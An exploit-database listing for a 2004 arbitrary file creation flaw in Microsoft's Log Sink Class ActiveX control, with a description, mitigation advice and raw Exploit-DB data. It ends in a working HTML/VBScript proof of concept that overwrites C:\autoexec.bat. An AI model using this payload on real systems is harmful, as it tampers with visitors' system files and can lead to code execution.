header-logo
Suggest Exploit
vendor:
Log Sink Class ActiveX Control
by:
SecurityFocus
8.8
CVSS
HIGH
Microsoft Log Sink Class ActiveX Control Arbitrary File Creation
264
CWE
Product Name: Log Sink Class ActiveX Control
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2004

Microsoft Log Sink Class ActiveX Control Arbitrary File Creation

A remote attacker can exploit this issue by crafting a malicious Web site that triggers this vulnerability and enticing a user to visit the site. If successful, the attacker may create arbitrary files on the computer. This may lead to various attacks including arbitrary code execution.

Mitigation:

Users should avoid visiting untrusted Web sites and should not click on links or open attachments from untrusted sources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12646/info

Microsoft Log Sink Class ActiveX control can allow remote attackers to create arbitrary files on an affected computer.

A remote attacker can exploit this issue by crafting a malicious Web site that triggers this vulnerability and enticing a user to visit the site. If successful, the attacker may create arbitrary files on the computer. This may lead to various attacks including arbitrary code execution. 

<object id=ctl
classid="clsid:{DE4735F3-7532-4895-93DC-9A10C4257173}"></object>
<script language="vbscript">
ctl.initsink "C:\autoexec.bat"
ctl.addstring "echo Drive formatted? ", ""
ctl.deinitsink
</script>